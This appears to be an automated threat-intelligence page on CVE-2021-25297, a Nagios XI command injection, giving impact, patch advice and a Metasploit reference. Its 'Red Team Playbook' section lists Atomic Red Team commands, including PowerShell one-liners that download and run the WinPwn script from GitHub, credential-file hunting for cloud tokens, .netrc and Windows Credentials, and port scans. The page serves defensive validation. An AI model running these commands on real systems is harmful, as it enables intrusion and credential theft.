CVE-2021-25297
Overview
Nagios XI version xi-5.7.5 contains an OS command injection vulnerability due to improper sanitization of user-supplied input within the configuration wizard file switch.inc.php. This flaw arises from unsafe handling of authenticated HTTP request parameters in the component responsible for managing switch configurations, allowing execution of arbitrary system commands on the server.
Vulnerability Description
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
Impact
An attacker with low-privileged authenticated access can execute arbitrary OS commands on the Nagios XI server, potentially leading to full system compromise. This includes unauthorized data access, modification, or destruction, and the ability to pivot within the network. The vulnerability enables remote code execution without requiring user interaction beyond authentication, posing a significant threat to the confidentiality, integrity, and availability of the affected system and its monitored infrastructure.
Solution
Nagios has released updated versions addressing this issue; users should upgrade to the latest Nagios XI version available on the official downloads page at https://assets.nagios.com/downloads/nagiosxi/versions.php. Detailed patch instructions and advisories can be found in the vendor’s official release notes. Applying the update replaces the vulnerable switch.inc.php component with a sanitized version, mitigating the command injection flaw.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Nagios XI version 5.7.5 arises from an OS command injection flaw within the file responsible for handling configuration wizards. This issue is primarily due to inadequate sanitization of user inputs, allowing an authenticated user to manipulate the system through crafted HTTP requests. When the application processes these inputs without proper validation, it opens a pathway for attackers to execute arbitrary commands on the underlying operating system. This flaw is particularly concerning because it can be exploited by users who already have access to the application, thereby bypassing many traditional security measures that are designed to protect against external threats.
Attack vectors for this vulnerability are relatively straightforward, as they involve sending specially crafted requests to the affected application. An attacker with valid credentials could exploit this flaw by injecting malicious commands into the input fields of the configuration wizard. For instance, by manipulating parameters in the HTTP request, an attacker could execute system-level commands that could lead to unauthorized access, data exfiltration, or even complete system compromise. The ease of exploitation, combined with the potential for significant damage, makes this vulnerability particularly dangerous, especially in environments where Nagios XI is used to monitor critical infrastructure.
The real-world impact of this vulnerability can be substantial, especially for organizations that rely on Nagios XI for monitoring their IT environments. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential downtime, which can have cascading effects on business operations. The financial implications of such an incident can be severe, including costs associated with incident response, system recovery, and potential regulatory fines if sensitive data is compromised. Furthermore, the reputational damage resulting from a security breach can erode customer trust and lead to long-term impacts on business viability.
To detect and mitigate this vulnerability, organizations should adopt a multi-layered security approach. Regularly updating the Nagios XI software to the latest version is crucial, as vendors typically release patches to address known vulnerabilities. Implementing web application firewalls (WAFs) can help filter out malicious requests before they reach the application. Additionally, organizations should conduct regular security assessments and penetration testing to identify potential weaknesses in their systems. Monitoring logs for unusual activity, particularly around authentication and command execution, can also provide early warning signs of exploitation attempts.
In conclusion, the OS command injection vulnerability in Nagios XI represents a significant risk to organizations using this monitoring tool. The potential for exploitation by authenticated users highlights the need for stringent input validation and robust security practices. By understanding the technical details, recognizing the attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the threats posed by such vulnerabilities. Cybersecurity is an ongoing process, and vigilance is essential to safeguard critical systems and data.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-25297, evidenced by new telemetry indicating active use of publicly available Metasploit modules that chain this vulnerability with related Nagios XI flaws. Although the EPSS score has decreased significantly, this divergence suggests that while broad opportunistic exploitation may be waning, targeted attacks leveraging authenticated access are intensifying. This shift underscores a refined adversary focus on leveraging valid credentials to execute OS command injection, elevating the risk of remote code execution within monitored environments. For defenders, this evolution highlights the criticality of monitoring for suspicious authenticated activity and reinforces the need for heightened vigilance despite a lower general exploit probability metric. Consequently, the threat level remains high due to the demonstrated feasibility of exploitation in operational settings and the availability of effective exploitation tools.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Nagios | Nagios Xi | All |
cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
exploits/linux/http/nagios_xi_configwizards_authenticated_rce
|
Matthew Mathur | Unknown | - | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-25297 |
| nagios.com |
GitHub CVE
|
http://nagios.com |
| assets.nagios.com |
GitHub CVE
|
https://assets.nagios.com/downloads/nagiosxi/versions.php |
| github.com |
GitHub CVE
|
https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html |
| fastly.com |
GitHub CVE
|
https://www.fastly.com/blog/anatomy-of-a-command-injection-cve-2021-25296-7-8-with-metasploit-module-and |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-25297 |